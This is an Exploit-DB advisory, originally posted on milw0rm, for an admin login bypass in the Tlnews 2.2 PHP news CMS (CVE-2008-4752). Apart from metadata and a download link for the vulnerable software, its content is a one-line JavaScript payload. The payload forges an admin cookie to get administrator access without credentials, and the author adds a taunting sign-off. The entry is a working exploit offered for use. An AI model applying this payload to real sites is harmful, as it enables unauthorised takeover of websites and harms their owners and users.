Tlnews 2.2 Insecure Cookie Handling Vulnerability

2008-10-25T00:00:00
ID EDB-ID:6836
Type exploitdb
Reporter x0r
Modified 2008-10-25T00:00:00

Description

Tlnews 2.2 Insecure Cookie Handling Vulnerability. CVE-2008-4752. Webapps exploit for php platform

                                        
                                            Tlnews 2.2 Admin Login Bypass (via Cookie)
Found by X0r - EvolutionTeaM
Email: evolutionteam.x0[at]gmail[dot]com

Cms Download: http://www.easy-script.com/scripts-dl/tlnews-22.zip

Exploit: javascript:document.cookie = "tlNews_login=admin; content=admin;
path=/"

Beby y0ur system g0t d0wn :P 

// X0r - EvolutionTeaM

# milw0rm.com [2008-10-25]